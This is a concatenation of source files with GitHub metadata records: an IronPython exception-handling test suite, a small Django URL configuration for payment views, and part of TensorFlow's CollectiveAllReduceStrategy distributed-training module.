def test_finally_continue_nested_finally_fails():
t = '''
try:
pass
finally:
for i in range(1):
try:
pass
finally:
continue
'''
try:
compile(t, '<test>', 'exec')
Fail("Should raise SyntaxError")
except SyntaxError:
pass
def test_bigint_division():
def divide(a, b):
try:
c = a / b
Fail("Expected ZeroDivisionError for %r / %r == %r" % (a, b, c))
except ZeroDivisionError:
pass
try:
c = a % b
Fail("Expected ZeroDivisionError for %r %% %r == %r" % (a, b, c))
except ZeroDivisionError:
pass
try:
c = a // b
Fail("Expected ZeroDivisionError for %r // %r == %r" % (a, b, c))
except ZeroDivisionError:
pass
big0 = 9999999999999999999999999999999999999999999999999999999999999999999999
big0 = big0-big0
pats = [0L, 0, 0.0, big0, (0+0j)]
nums = [42, 987654321, 7698736985726395723649587263984756239847562983745692837465928374569283746592837465923, 2352345324523532523, 5223523.3453, (10+25j)]
for divisor in pats:
for number in nums:
divide(number, divisor)
# sys.exit() test
def test_handlers():
handlers = []
def a():
try:
b()
finally:
handlers.append("finally a")
def b():
try:
c()
finally:
handlers.append("finally b")
def c():
try:
d()
finally:
handlers.append("finally c")
def d():
sys.exit("abnormal termination")
try:
a()
except SystemExit, e:
handlers.append(e.args[0])
Assert(handlers == ["finally c", "finally b", "finally a", "abnormal termination"])
def test_sys_exit1():
try:
sys.exit()
Assert(False)
except SystemExit, e:
AreEqual(len(e.args), 0)
def test_sys_exit2():
try:
sys.exit(None)
Assert(False)
except SystemExit, e:
AreEqual(e.args, ())
AreEqual(SystemExit(None).args, (None,))
def test_sys_exit3():
try:
sys.exit(-10)
except SystemExit, e:
AreEqual(e.code, -10)
AreEqual(e.args, (-10,))
else:
Assert(False)
################################
# exception interop tests
if is_cli or is_silverlight:
def test_interop():
load_iron_python_test()
from IronPythonTest import ExceptionsTest
import System
import sys
a = ExceptionsTest()
try:
a.ThrowException() # throws index out of range
except IndexError, e:
Assert(e.__class__ == IndexError)
class MyTest(ExceptionsTest):
def VirtualFunc(self):
raise ex, "hello world"
ex = ValueError
a = MyTest()
# raise in python, translate into .NET, catch in Python
try:
a.CallVirtual()
except ex, e:
Assert(e.__class__ == ValueError)
Assert(e.args[0] == "hello world")
# raise in python, catch in .NET, verify .NET got an ArgumentException
try:
x = a.CallVirtCatch()
except ex, e:
Assert(False)
Assert(isinstance(x, System.ArgumentException))
# call through the slow paths...
try:
a.CallVirtualOverloaded('abc')
except ex,e:
Assert(e.__class__ == ex)
Assert(e.args[0] == "hello world")
# Note that sys.exc_info() is still set
try:
a.CallVirtualOverloaded(5)
except ex,e:
Assert(e.__class__ == ex)
Assert(e.args[0] == "hello world")
try:
a.CallVirtualOverloaded(a)
except ex,e:
Assert(e.__class__ == ex)
Assert(e.args[0] == "hello world")
# catch and re-throw (both throw again and rethrow)
try:
a.CatchAndRethrow()
except ex,e:
Assert(e.__class__ == ex)
Assert(e.args[0] == "hello world")
try:
a.CatchAndRethrow2()
except ex,e:
Assert(e.__class__ == ex)
Assert(e.args[0] == "hello world")
class MyTest(ExceptionsTest):
def VirtualFunc(self):
self.ThrowException()
a = MyTest()
# start in python, call CLS which calls Python which calls CLS which raises the exception
try:
a.CallVirtual() # throws index out of range
except IndexError, e:
Assert(e.__class__ == IndexError)
# verify we can throw arbitrary classes
class MyClass: pass
try:
raise MyClass
Assert(False)
except MyClass, mc:
Assert(mc.__class__ == MyClass)
# BUG 430 intern(None) should throw TypeError
try:
intern(None)
Assert(False)
except TypeError:
pass
# /BUG
# BUG 393 exceptions throw when bad value passed to except
try:
try:
raise SyntaxError("foo")
except 12:
Assert(False)
pass
except SyntaxError:
pass
# /BUG
# BUG 319 IOError not raised.
if is_silverlight==False:
try:
fp = file('thisfiledoesnotexistatall.txt')
except IOError:
pass
# /BUG
# verify we can raise & catch CLR exceptions
try:
raise System.Exception('Hello World')
except System.Exception, e:
Assert(type(e) == System.Exception)
# BUG 481 Trying to pass raise in Traceback should cause an error until it is implemented
try:
raise StopIteration("BadTraceback"), "somedata", "a string is not a traceback"
Assert (False, "fell through raise for some reason")
except StopIteration:
Assert(False)
except TypeError:
pass
try:
raise TypeError
except:
import sys
if (sys.exc_traceback != None):
x = dir(sys.exc_traceback)
for name in ['tb_frame', 'tb_lasti', 'tb_lineno', 'tb_next']:
Assert(name in x, name)
try:
raise Exception("foo"), "Msg", sys.exc_traceback
except Exception, X:
pass
try:
raise Exception(3,4,5)
except Exception, X:
AreEqual(X[0], 3)
AreEqual(X[1], 4)
AreEqual(X[2], 5)
try:
raise Exception
except:
import exceptions
AreEqual(sys.exc_info()[0], exceptions.Exception)
AreEqual(sys.exc_info()[1].__class__, exceptions.Exception)
try:
Fail("message")
except AssertionError, e:
import exceptions
AreEqual(e.__class__, exceptions.AssertionError)
AreEqual(len(e.args), 1)
AreEqual(e.args[0], "message")
else:
Fail("Expected exception")
#####################################################################################
# __str__ behaves differently for exceptions because of implementation (ExceptionConverter.ExceptionToString)
# TODO: doesn't work in IronPython
#def test_str1():
# AssertErrorWithMessage(TypeError, "descriptor '__str__' of 'exceptions.BaseException' object needs an argument", Exception.__str__)
# AssertErrorWithMessage(TypeError, "descriptor '__str__' requires a 'exceptions.BaseException' object but received a 'list'", Exception.__str__, list())
# AssertErrorWithMessage(TypeError, "descriptor '__str__' requires a 'exceptions.BaseException' object but received a 'list'", Exception.__str__, list(), 1)
# AssertErrorWithMessage(TypeError, "expected 0 arguments, got 1", Exception.__str__, Exception(), 1)
def test_str2():
# verify we can assign to sys.exc_*
sys.exc_traceback = None
sys.exc_value = None
sys.exc_type = None
AreEqual(str(Exception()), '')
#####################################################################
if is_cli or is_silverlight:
def test_array():
import System
try:
a = System.Array()
except Exception, e:
AreEqual(e.__class__, TypeError)
else:
Assert(False, "FAILED!")
def test_assert_error():
AssertError(ValueError, chr, -1)
AssertError(TypeError, None)
def test_dir():
testingdir = 10
Assert('testingdir' in dir())
del testingdir
Assert(not 'testingdir' in dir())
def test_assert():
try:
Assert(False, "Failed message")
except AssertionError, e:
Assert(e.args[0] == "Failed message")
else:
Fail("should have thrown")
try:
Assert(False, "Failed message 2")
except AssertionError, e:
Assert(e.args[0] == "Failed message 2")
else:
Fail("should have thrown")
def test_syntax_error_exception():
try:
compile('a = """\n\n', 'foo', 'single', 0x200)
except SyntaxError, se:
AreEqual(se.offset, 9)
try:
compile('a = """\n\nxxxx\nxxx\n', 'foo', 'single', 0x200)
except SyntaxError, se:
AreEqual(se.offset, 18)
try:
compile('abc\na = """\n\n', 'foo', 'exec', 0x200)
except SyntaxError, se:
AreEqual(se.offset, 9)
try:
compile("if 2==2: x=2\nelse:y=", "Error", "exec")
except SyntaxError, se:
l1 = dir(se)
Assert('lineno' in l1)
Assert('offset' in l1)
Assert('filename' in l1)
Assert('text' in l1)
if is_cli or is_silverlight:
import clr
l2 = dir(se.clsException)
Assert('Line' in l2)
Assert('Column' in l2)
Assert('GetSymbolDocumentName' in l2)
Assert('GetCodeLine' in l2)
AreEqual(se.lineno, 2)
# Bug 1132
#AreEqual(se.offset, 7)
AreEqual(se.filename, "Error")
if is_ironpython: #http://ironpython.codeplex.com/workitem/27989
AreEqual(se.text, "else:y=")
else:
AreEqual(se.text, "else:y=\n")
if is_cli or is_silverlight:
AreEqual(se.clsException.Line, 2)
# Bug 1132
#AreEqual(se.clsException.Column, 7)
AreEqual(se.clsException.GetSymbolDocumentName(), "Error")
AreEqual(se.clsException.GetCodeLine(), "else:y=")
AreEqual(se.__dict__, {})
AreEqual(type(se.__dict__), dict)
def test_syntax_error_exception_exec():
try:
compile("if 2==2: x=", "Error", "exec")
except SyntaxError, se:
AreEqual(se.lineno, 1)
# Bug 1132
#AreEqual(se.offset, 11)
AreEqual(se.filename, "Error")
if is_ironpython: #http://ironpython.codeplex.com/workitem/27989
AreEqual(se.text, "if 2==2: x=")
else:
AreEqual(se.text, "if 2==2: x=\n")
AreEqual(se.__dict__, {})
AreEqual(type(se.__dict__), dict)
def test_syntax_error_exception_eval():
try:
compile("if 2==2: x=", "Error", "eval")
except SyntaxError, se:
AreEqual(se.lineno, 1)
# Bug 1132
#AreEqual(se.offset, 2)
AreEqual(se.filename, "Error")
AreEqual(se.text, "if 2==2: x=")
AreEqual(se.__dict__, {})
AreEqual(type(se.__dict__), dict)
def test_user_syntax_error_exception():
x = SyntaxError()
AreEqual(x.lineno, None)
AreEqual(x.filename, None)
AreEqual(x.msg, None)
AreEqual(x.message, '')
AreEqual(x.offset, None)
AreEqual(x.print_file_and_line, None)
AreEqual(x.text, None)
#Run a few minimal tests to ensure the __dict__ member works OK
AreEqual(x.__dict__, {})
AreEqual(type(x.__dict__), dict)
x.arbitrary = 3.14
AreEqual(x.__dict__["arbitrary"], 3.14)
del x.__dict__["arbitrary"]
AreEqual(x.__dict__, {})
x = SyntaxError('hello')
AreEqual(x.lineno, None)
AreEqual(x.filename, None)
AreEqual(x.msg, 'hello')
AreEqual(x.message, 'hello')
AreEqual(x.offset, None)
AreEqual(x.print_file_and_line, None)
AreEqual(x.text, None)
x = SyntaxError('hello', (1,2,3,4))
AreEqual(x.lineno, 2)
AreEqual(x.filename, 1)
AreEqual(x.msg, 'hello')
AreEqual(x.message, '')
AreEqual(x.offset, 3)
AreEqual(x.print_file_and_line, None)
AreEqual(x.text, 4)
AssertError(IndexError, SyntaxError, 'abc', ())
AssertError(IndexError, SyntaxError, 'abc', (1,))
AssertError(IndexError, SyntaxError, 'abc', (1,2))
AssertError(IndexError, SyntaxError, 'abc', (1,2,3))
def test_return():
def test_func():
try: pass
finally:
try: raise 'foo'
except:
return 42
AreEqual(test_func(), 42)
def test_func():
try: pass
finally:
try: raise 'foo'
except:
try: raise 'foo'
except:
return 42
AreEqual(test_func(), 42)
def test_func():
try: pass
finally:
try: pass
finally:
try: raise 'foo'
except:
try: raise 'foo'
except:
return 42
AreEqual(test_func(), 42)
def test_func():
try: raise 'foo'
except:
try: pass
finally:
try: raise 'foo'
except:
try: raise 'foo'
except:
return 42
AreEqual(test_func(), 42)
def test_break_and_continue():
class stateobj(object):
__slots__ = ['loops', 'finallyCalled']
def __init__(self):
self.loops = 0
self.finallyCalled = False
def test_break(state):
try:
try:
raise Exception()
except:
for n in range(10):
state.loops += 1
break
return 42
except: pass
def test_continue(state):
try:
try:
raise Exception()
except:
for n in range(10):
state.loops += 1
continue
return 42
except: pass
def test_multi_break(state):
try:
try:
raise Exception()
except:
for n in range(10):
state.loops += 1
if False: break
break
return 42
except: pass
def test_multi_continue(state):
try:
try:
raise Exception()
except:
for n in range(10):
state.loops += 1
if False: continue
continue
return 42
except: pass
state = stateobj()
AreEqual(test_break(state), 42)
AreEqual(state.loops, 1)
state = stateobj()
AreEqual(test_continue(state), 42)
AreEqual(state.loops, 10)
state = stateobj()
AreEqual(test_multi_break(state), 42)
AreEqual(state.loops, 1)
state = stateobj()
AreEqual(test_multi_continue(state), 42)
AreEqual(state.loops, 10)
def test_break_in_finally_raise(state):
for x in range(10):
try:
raise 'foo'
finally:
state.finallyCalled = True
break
return 42
def test_break_in_finally(state):
for x in range(10):
try: pass
finally:
state.finallyCalled = True
break
return 42
state = stateobj()
AreEqual(test_break_in_finally_raise(state), 42)
AreEqual(state.finallyCalled, True)
state = stateobj()
AreEqual(test_break_in_finally(state), 42)
AreEqual(state.finallyCalled, True)
def test_outer_for_with_finally(state, shouldRaise):
for x in range(10):
try:
try:
if shouldRaise:
raise 'hello world'
finally:
state.finallyCalled = True
break
except:
pass
raise 'bad!!!'
return 42
state = stateobj()
AreEqual(test_outer_for_with_finally(state, False), 42)
AreEqual(state.finallyCalled, True)
state = stateobj()
AreEqual(test_outer_for_with_finally(state, True), 42)
AreEqual(state.finallyCalled, True)
def test_outer_for_with_finally(state, shouldRaise):
for x in range(10):
try:
try:
if shouldRaise:
raise 'hello world'
finally:
state.finallyCalled = True
break
except:
pass
raise 'bad!!!'
return 42
state = stateobj()
AreEqual(test_outer_for_with_finally(state, False), 42)
AreEqual(state.finallyCalled, True)
state = stateobj()
AreEqual(test_outer_for_with_finally(state, True), 42)
AreEqual(state.finallyCalled, True)
def test_serializable_clionly():
import clr
import System
from IronPythonTest import ExceptionsTest
path = clr.GetClrType(ExceptionsTest).Assembly.Location
mbro = System.AppDomain.CurrentDomain.CreateInstanceFromAndUnwrap(path, "IronPythonTest.EngineTest")
AssertError(AssertionError, mbro.Run, 'raise AssertionError')
import exceptions
for eh in dir(exceptions):
eh = getattr(exceptions, eh)
if isinstance(eh, type) and issubclass(eh, BaseException):
# unicode exceptions require more args...
if (eh.__name__ != 'UnicodeDecodeError' and
eh.__name__ != 'UnicodeEncodeError' and
eh.__name__ != 'UnicodeTranslateError'):
AssertError(eh, mbro.Run, 'raise ' + eh.__name__)
def test_sanity():
'''
Sanity checks to ensure all exceptions implemented can be created/thrown/etc
in the standard ways.
'''
#build up a list of all valid exceptions
import exceptions
#special cases - do not test these like everything else
special_types = [ "UnicodeTranslateError", "UnicodeEncodeError", "UnicodeDecodeError"]
exception_types = [ x for x in exceptions.__dict__.keys() if x.startswith("__")==False and special_types.count(x)==0]
exception_types = [ eval("exceptions." + x) for x in exception_types]
#run a few sanity checks
for exception_type in exception_types:
except_list = [exception_type(), exception_type("a single param")]
for t_except in except_list:
try:
raise t_except
except exception_type, e:
pass
str_except = str(t_except)
#there is no __getstate__ method of exceptions...
Assert(not hasattr(t_except, '__getstate__'))
if not is_silverlight:
#special cases
encode_except = exceptions.UnicodeEncodeError("1", u"2", 3, 4, "5")
AreEqual(encode_except.encoding, "1")
AreEqual(encode_except.object, u"2")
AreEqual(encode_except.start, 3)
AreEqual(encode_except.end, 4)
AreEqual(encode_except.reason, "5")
AreEqual(encode_except.message, "")
#CodePlex Work Item 356
#AssertError(TypeError, exceptions.UnicodeDecodeError, "1", u"2", 3, 4, "e")
exceptions.UnicodeDecodeError("1", "2", 3, 4, "e")
decode_except = exceptions.UnicodeDecodeError("1", "2", 3, 4, "5")
AreEqual(decode_except.encoding, "1")
AreEqual(decode_except.object, "2")
AreEqual(decode_except.start, 3)
AreEqual(decode_except.end, 4)
AreEqual(decode_except.reason, "5")
AreEqual(decode_except.message, "")
translate_except = exceptions.UnicodeTranslateError(u"1", 2, 3, "4")
AreEqual(translate_except.object, u"1")
AreEqual(translate_except.start, 2)
AreEqual(translate_except.end, 3)
AreEqual(translate_except.reason, "4")
AreEqual(translate_except.message, "")
AreEqual(translate_except.encoding, None)
def test_nested_exceptions():
try:
raise Exception()
except Exception, e:
# PushException
try:
raise TypeError
except TypeError, te:
# PushException
ei = sys.exc_info()
# PopException
ei2 = sys.exc_info()
AreEqual(ei, ei2)
ei3 = sys.exc_info()
AreEqual(ei, ei3)
def test_swallow_from_else():
def f():
try:
pass
except:
pass
else:
raise AttributeError
finally:
return 4
AreEqual(f(), 4)
def test_newstyle_raise():
# raise a new style exception via raise type, value that returns an arbitrary object
class MyException(Exception):
def __new__(cls, *args): return 42
try:
raise MyException, 'abc'
AssertUnreachable()
except Exception, e:
AreEqual(e, 42)
def test_enverror_init():
x = EnvironmentError()
AreEqual(x.message, '')
AreEqual(x.errno, None)
AreEqual(x.filename, None)
AreEqual(x.strerror, None)
AreEqual(x.args, ())
x.__init__('abc')
AreEqual(x.message, 'abc')
AreEqual(x.args, ('abc', ))
x.__init__('123', '456')
AreEqual(x.message, 'abc')
AreEqual(x.errno, '123')
AreEqual(x.strerror, '456')
AreEqual(x.args, ('123', '456'))
x.__init__('def', 'qrt', 'foo')
AreEqual(x.message, 'abc')
AreEqual(x.errno, 'def')
AreEqual(x.strerror, 'qrt')
AreEqual(x.filename, 'foo')
AreEqual(x.args, ('def', 'qrt')) # filename not included in args
x.__init__()
AreEqual(x.message, 'abc')
AreEqual(x.errno, 'def')
AreEqual(x.strerror, 'qrt')
AreEqual(x.filename, 'foo')
AreEqual(x.args, ())
x.__init__('1', '2', '3', '4')
AreEqual(x.message, 'abc')
AreEqual(x.errno, 'def')
AreEqual(x.strerror, 'qrt')
AreEqual(x.filename, 'foo')
AreEqual(x.args, ('1', '2', '3', '4'))
x = EnvironmentError('a', 'b', 'c', 'd')
AreEqual(x.message, '')
AreEqual(x.errno, None)
AreEqual(x.filename, None)
AreEqual(x.strerror, None)
AreEqual(x.args, ('a', 'b', 'c', 'd'))
def test_raise_None():
lineno1, lineno2 = 0, 0
try:
raise None
except:
lineno1 = sys.exc_info()[2].tb_lineno
try:
# dummy line
raise None
except:
lineno2 = sys.exc_info()[2].tb_lineno
Assert(lineno1 != lineno2, "FAILED! Should not have reused exception")
def test_exception_setstate():
x = BaseException()
AreEqual(x.__dict__, {})
x.__setstate__({'a' : 1, 'b' : 2})
AreEqual(x.__dict__, {'a' : 1, 'b' : 2})
x.__setstate__({'a' : 3, 'c' : 4})
AreEqual(x.__dict__, {'a' : 3, 'b' : 2, 'c' : 4})
def test_deprecated_string_exception():
w = warning_trapper()
try:
raise 'Error'
except:
pass
m = w.finish()
try:
raise 'foo'
except TypeError, e:
print e.message
def test_nested_try():
global l
l = []
def foo():
try:
try:
l.append(1)
except:
pass
except:
l.append(2)
else:
l.append(3)
foo()
AreEqual(l, [1, 3])
l = []
def bar():
try:
l.append(1)
except:
l.append(2)
else:
l.append(3)
bar()
AreEqual(l, [1, 3])
def test_module_exceptions():
"""verify exceptions in modules are like user defined exception objects, not built-in types."""
# these modules have normal types...
normal_types = ['sys', 'clr', 'exceptions', '__builtin__', '_winreg', 'mmap', 'nt']
builtins = [x for x in sys.builtin_module_names if x not in normal_types ]
for module in builtins:
mod = __import__(module)
for attrName in dir(mod):
val = getattr(mod, attrName)
if isinstance(val, type) and issubclass(val, Exception):
if "BlockingIOError" not in repr(val):
Assert(repr(val).startswith("<class "))
val.x = 2
AreEqual(val.x, 2)
elif is_cpython:
Assert(repr(val).startswith("<type "))
else: #http://ironpython.codeplex.com/workitem/28383
Assert(repr(val).startswith("<class "))
def test_raise_inside_str():
#raising an error inside the __str__ used to cause an unhandled exception.
class error(Exception):
def __str__(self):
raise TypeError, "inside __str__"
def f():
raise error
AssertError(error, f)
def test_exception_doc():
# should be accessible, CPython and IronPython have different strings though.
Exception().__doc__
Exception("abc").__doc__
def test_repr_not_called():
"""__repr__ shouldn't be called when message is a tuple w/ multiple args"""
class x(object):
def __repr__(self):
raise StopIteration('repr should not be called')
try:
sys.exit((x(), x()))
except SystemExit:
pass
def test_windows_error():
# int is required for 2/3 params
AssertError(TypeError, WindowsError, 'foo', 'bar')
AssertError(TypeError, WindowsError, 'foo', 'bar', 'baz')
err = WindowsError('foo', 'bar', 'baz', 'quox')
AreEqual(err.errno, None)
AreEqual(err.winerror, None)
AreEqual(err.filename, None)
AreEqual(err.strerror, None)
AreEqual(err.args, ('foo', 'bar', 'baz', 'quox'))
err = WindowsError(42, 'bar', 'baz')
AreEqual(err.filename, 'baz')
AreEqual(err.winerror, 42)
AreEqual(err.strerror, 'bar')
AreEqual(err.args, (42, 'bar'))
# winerror code is passed through unmodified
for i in xrange(256):
x = WindowsError(i, 'foo')
AreEqual(x.winerror, i)
# winerror code is mapped to Python error code
AreEqual(WindowsError(10, 'foo').errno, 7)
def test_derived_keyword_args():
class ED(Exception):
def __init__(self, args=''):
pass
AreEqual(type(ED(args='')), ED)
run_test(__name__)
| {
"content_hash": "d44639559014ff73355c2c64694ea39e",
"timestamp": "",
"source": "github",
"line_count": 1038,
"max_line_length": 159,
"avg_line_length": 27.886319845857418,
"alnum_prop": 0.5230774545705797,
"repo_name": "paweljasinski/ironpython3",
"id": "8d2fe7d8439d4d2899904619bcea32fd4a452e07",
"size": "29672",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Tests/test_exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "11099"
},
{
"name": "C#",
"bytes": "12284108"
},
{
"name": "CSS",
"bytes": "96"
},
{
"name": "Groff",
"bytes": "21080"
},
{
"name": "HTML",
"bytes": "13117230"
},
{
"name": "Makefile",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "PowerShell",
"bytes": "62360"
},
{
"name": "Python",
"bytes": "27267678"
},
{
"name": "R",
"bytes": "4949"
},
{
"name": "Ruby",
"bytes": "19"
},
{
"name": "Shell",
"bytes": "5147"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
} |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^addpayment$', views.addPayment.as_view(), name='addpayment'),
url(r'^paymentmethods$', views.paymentMethods.as_view(), name='paymentmethods'),
]
| {
"content_hash": "165044fb5ebf936ad148cd314c5b8811",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 85,
"avg_line_length": 34.57142857142857,
"alnum_prop": 0.6735537190082644,
"repo_name": "The-Akatsuki/thirdp",
"id": "7a4975fee8762dacbbad362858bd19c2c4d01b69",
"size": "242",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/payments/urls.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "196798"
},
{
"name": "HTML",
"bytes": "97337"
},
{
"name": "JavaScript",
"bytes": "11808"
},
{
"name": "Python",
"bytes": "48364"
},
{
"name": "Shell",
"bytes": "549"
}
],
"symlink_target": ""
} |
"""Class CollectiveAllReduceStrategy implementing DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.distribute.python import cross_tower_ops as cross_tower_ops_lib
from tensorflow.contrib.distribute.python import cross_tower_utils
from tensorflow.contrib.distribute.python import mirrored_strategy
from tensorflow.contrib.distribute.python import values
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.platform import tf_logging as logging
# TODO(yuefengz): support in-graph replication.
class CollectiveAllReduceStrategy(mirrored_strategy.MirroredStrategy):
"""Distribution strategy that uses collective ops for all-reduce.
It is similar to the MirroredStrategy but it uses collective ops for
reduction.
When `cluster_spec` is given by the `configure` method, it turns into the
mulit-worker version that works on multiple workers with between-graph
replication.
Note: `configure` will be called by higher-level APIs if running in
distributed environment.
"""
def __init__(self, num_gpus_per_worker=0):
"""Initializes the object.
Args:
num_gpus_per_worker: number of local GPUs or GPUs per worker, the default
is 0 meaning CPU only.
"""
self._num_gpus_per_worker = num_gpus_per_worker
self._initialize_local_worker(num_gpus_per_worker)
def _initialize_local_worker(self, num_gpus_per_worker):
"""Initializes the object for local training."""
self._is_chief = True
self._num_workers = 1
if num_gpus_per_worker:
local_devices = [
"/device:GPU:%d" % i for i in range(num_gpus_per_worker)
]
else:
local_devices = ["/device:CPU:0"]
self._collective_keys = cross_tower_utils.CollectiveKeys()
super(CollectiveAllReduceStrategy, self).__init__(
devices=local_devices,
cross_tower_ops=cross_tower_ops_lib.CollectiveAllReduce(
num_workers=1,
num_gpus_per_worker=num_gpus_per_worker,
collective_keys=self._collective_keys))
self._cluster_spec = None
self._task_type = None
self._task_id = None
logging.info("CollectiveAllReduceStrategy with local_devices = %r",
local_devices)
def _initialize_multi_worker(self, num_gpus_per_worker, cluster_spec,
task_type, task_id):
"""Initializes the object for multi-worker training."""
if task_type is None or task_id is None:
raise ValueError("When `cluster_spec` is given, you must also specify "
"`task_type` and `task_id`")
if task_type not in ["chief", "worker"]:
raise ValueError(
"Unrecognized task_type: %r, valid task types are: \"chief\", "
"\"worker\"." % task_type)
cluster_spec = multi_worker_util.normalize_cluster_spec(cluster_spec)
self._num_workers = len(cluster_spec.as_dict().get("worker", [])) + len(
cluster_spec.as_dict().get("chief", []))
if not self._num_workers:
raise ValueError("No `worker` or `chief` tasks can be found in "
"`cluster_spec`.")
self._is_chief = multi_worker_util.is_chief(cluster_spec, task_type,
task_id)
worker_device = "/job:%s/task:%d" % (task_type, task_id)
if num_gpus_per_worker:
local_devices = [
"%s/device:GPU:%d" % (worker_device, i)
for i in range(num_gpus_per_worker)
]
else:
local_devices = [worker_device]
self._collective_keys = cross_tower_utils.CollectiveKeys()
super(CollectiveAllReduceStrategy, self).__init__(
devices=local_devices,
cross_tower_ops=cross_tower_ops_lib.CollectiveAllReduce(
num_workers=self._num_workers,
num_gpus_per_worker=num_gpus_per_worker,
collective_keys=self._collective_keys))
# Add a default device so that ops without specified devices will not end up
# on other workers.
self._default_device = "/job:%s/task:%d" % (task_type, task_id)
self._cluster_spec = multi_worker_util.normalize_cluster_spec(cluster_spec)
self._task_type = task_type
self._task_id = task_id
logging.info(
"Multi-worker CollectiveAllReduceStrategy with "
"cluster_spec = %r, task_type = %r, task_id = %r, "
"num_workers = %r, local_devices = %r", cluster_spec.as_dict(),
task_type, task_id, self._num_workers, local_devices)
def _create_variable(self, next_creator, *args, **kwargs):
colocate_with = kwargs.pop("colocate_with", None)
devices = self._get_devices_from(colocate_with)
group_size = len(devices) * self._num_workers
group_key = self._collective_keys.get_group_key(self._devices)
def _real_mirrored_creator(devices, *args, **kwargs):
"""Creates one MirroredVariable on the current worker."""
index = {}
unique_var_name = ops.get_default_graph().unique_name(
kwargs["name"], mark_as_used=False).rstrip("/")
collective_instance_key = self._collective_keys.get_instance_key(
key_id=unique_var_name)
if "initial_value" not in kwargs:
raise ValueError("Initial value must be specified.")
initial_value = kwargs["initial_value"]
if callable(initial_value):
initial_value_fn = initial_value
else:
initial_value_fn = lambda: initial_value
for i, d in enumerate(devices):
with ops.device(d):
if i > 0:
# Give replicas meaningful distinct names:
var0name = index[devices[0]].name.split(":")[0]
# We append a / to variable names created on replicas with id > 0 to
# ensure that we ignore the name scope and instead use the given
# name as the absolute name of the variable.
kwargs["name"] = "%s/replica_%d/" % (var0name, i)
# The initial value fn makes sure variables all initialized to
# same values. The first device of the chief worker will send their
# variable values to other devices and other workers.
def _overridden_initial_value_fn(device=d, index=i): # pylint: disable=g-missing-docstring
with ops.device(device):
initial_value = initial_value_fn()
assert not callable(initial_value)
initial_value = ops.convert_to_tensor(initial_value)
if self._is_chief and index == 0:
bcast_send = collective_ops.broadcast_send(
initial_value, initial_value.shape, initial_value.dtype,
group_size, group_key, collective_instance_key)
with ops.control_dependencies([bcast_send]):
return array_ops.identity(initial_value)
else:
return collective_ops.broadcast_recv(
initial_value.shape, initial_value.dtype, group_size,
group_key, collective_instance_key)
kwargs["initial_value"] = _overridden_initial_value_fn
with context.context().device_policy(context.DEVICE_PLACEMENT_SILENT):
v = next_creator(*args, **kwargs)
if i == 0:
actual_var_name = v.name.split(":")[0]
assert unique_var_name == actual_var_name, "%r vs %r" % (
unique_var_name, actual_var_name)
assert not isinstance(v, values.DistributedVariable)
index[d] = v
return index
# pylint: disable=protected-access
return mirrored_strategy._create_mirrored_variable(
devices, _real_mirrored_creator, *args, **kwargs)
def distribute_dataset(self, dataset_fn):
"""Distributes the dataset to each local GPU."""
# TODO(yuefengz): shard the dataset.
return values.PerDeviceDataset(
self._call_dataset_fn(dataset_fn), self._devices, True)
def configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
"""Configures the object.
Args:
session_config: a `tf.ConfigProto`
cluster_spec: a dict, ClusterDef or ClusterSpec object specifying the
cluster configurations.
task_type: the current task type, such as "worker".
task_id: the current task id.
Raises:
ValueError: if `task_type` is not in the `cluster_spec`.
"""
if not self._cluster_spec and cluster_spec:
# If a `cluster_spec` is already passed in, do nothing here.
# TODO(yuefengz): check `cluster_spec` is the same if this object has
# already been initialized with a `cluster_spec`.
self._initialize_multi_worker(self._num_gpus_per_worker, cluster_spec,
task_type, task_id)
if not session_config:
return
# Enable the scoped allocator optimization for CollectiveOps. This
# optimization converts many small all-reduces into fewer larger
# all-reduces.
rewrite_options = session_config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
# We turn on ScopedAllocator only for CollectiveReduce op, i.e. enable_op =
# ["CollectiveReduce"]. Since we can't assign to a repeated proto field, we
# clear and then append.
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append("CollectiveReduce")
if not self._cluster_spec:
return
assert self._task_type
assert self._task_id is not None
# Collective group leader is needed for collective ops to coordinate
# workers.
if "chief" in self._cluster_spec.jobs:
session_config.experimental.collective_group_leader = (
"/job:chief/replica:0/task:0")
else:
if "worker" not in self._cluster_spec.jobs:
raise ValueError(
"You must have `chief` or `worker` jobs in the `cluster_spec`.")
session_config.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
# The device filters prevent communication between workers.
del session_config.device_filters[:]
session_config.device_filters.append(
"/job:%s/task:%d" % (self._task_type, self._task_id))
@property
def between_graph(self):
return True
@property
def should_init(self):
return True
@property
def should_checkpoint(self):
return self._is_chief
@property
def should_save_summary(self):
return self._is_chief
@property
def num_replicas_in_sync(self):
return len(self._devices) * self._num_workers
| {
"content_hash": "aa0d049ce2a3b7381de0cef75cd1326b",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 101,
"avg_line_length": 39.410071942446045,
"alnum_prop": 0.6482292807594012,
"repo_name": "dongjoon-hyun/tensorflow",
"id": "d9339f8f75acda3695d33c55409e921a9627bac7",
"size": "11645",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/distribute/python/collective_all_reduce_strategy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3301"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "446293"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50950243"
},
{
"name": "CMake",
"bytes": "198845"
},
{
"name": "Dockerfile",
"bytes": "36908"
},
{
